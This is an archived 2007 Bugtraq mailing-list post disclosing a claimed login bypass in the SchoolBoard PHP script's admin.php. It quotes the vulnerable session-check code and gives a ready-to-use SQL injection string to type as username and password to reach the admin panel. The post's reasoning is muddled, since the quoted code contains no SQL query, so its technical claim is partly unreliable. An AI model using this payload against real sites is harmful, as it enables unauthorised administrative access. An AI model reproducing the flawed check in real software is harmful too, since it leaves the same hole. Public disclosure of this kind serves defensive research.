lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 3 May 2007 13:13:55 -0000
From: ilkerkandemir@...et.com
To: bugtraq@...urityfocus.com
Subject: SchoolBoard (admin.php) Remote Login Bypass SQL Injection
 Vulnerability

# Remote Login Bypass SQL Injection Vulnerability (admin.php)

#

# AYYILDIZ.ORG Presents.

# SchoolBoard [ http://free-php-scripts.net/download.php?id=120 ]

# author : iLker Kandemir    < ilkerkandemir <at> mynet.com >

# Tnx : h0tturk,ekin0x,Dr.Max Virus,Gencnesil,Gencturk,Ajann

# Vulnerable; /admin.php

-------------------------------------------------//If login in
if($_POST['password'] != NULL){    <<<---------------------[+] //do all this:
      
 if($_POST['password'] == $ADMIN_PASS){
  $_SESSION['is_admin'] = $ADMIN_PASS;
 } else {
  $message = 'Invalid Access';
 }
}

//Check password
if($_SESSION['is_admin'] != $ADMIN_PASS){$_GET['page'] = 'login';}

if($_GET['page'] == NULL){$_GET['page'] = $_POST['page'];}

if($_GET['page'] != 'Add' && $_GET['page'] != 'login'){  <<<-------------------[+]  // but the user/pass don't match

-------------------------------------------------


username : 1/**/union/**/select/**/1,2,3,4/*
password : 1/**/union/**/select/**/1,2,3,4/*   (ADMIN_PASS)

Panel: /admin.php logged.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ